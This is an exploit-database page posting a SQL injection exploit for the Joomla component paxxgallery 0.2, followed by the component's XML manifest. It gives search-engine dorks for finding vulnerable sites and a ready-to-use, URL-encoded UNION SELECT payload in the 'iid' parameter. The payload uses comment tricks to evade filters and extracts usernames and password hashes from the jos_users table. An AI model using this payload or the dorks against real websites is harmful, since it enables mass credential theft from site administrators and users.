Joomla Component paxxgallery 0.2 (iid) SQL Injection Vulnerability

Exploit Code :

###############################################################
#
# joomla SQL Injection(com_paxxgallery)
#
###############################################################
#
# AUTHOR : S@BUN
#
# http://www.hackturkiye.com
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
#
################################################################
#
# DORK 1 : allinurl: com_paxxgallery "iid"
#
# DORK 2 : allinurl: com_paxxgallery "userid"
#
################################################################
EXPLOIT :

AFTER userid ADD EXPLİOT(USERİD DEN SONRA EXPLOİT EKLE)

EXAMPLE=http:XXXXXX/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid
= EXPLOİT

EXPLOIT==

S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2
C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_
users

################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################

<name>paxxgallery</name>
<author>Tobias Floery</author>
<copyright>(c) Tobias Floery</copyright>
<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>
<authorEmail>tobias@floery.net</authorEmail>

<authorUrl>www.floery.net</authorUrl>
<version>0.2</version>
<creationDate>07.01.2006</creationDate>
<description>
<![CDATA[
<h1>The PHP AjaX Gallery</h1>
PAXXGallery is a PHP and JS Gallery Component for Joomla using AJAX
Technology.
The component is designed to work even with Safe- Mode: ON! servers and a
FTP Upload is integrated.
]]>
</description>

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason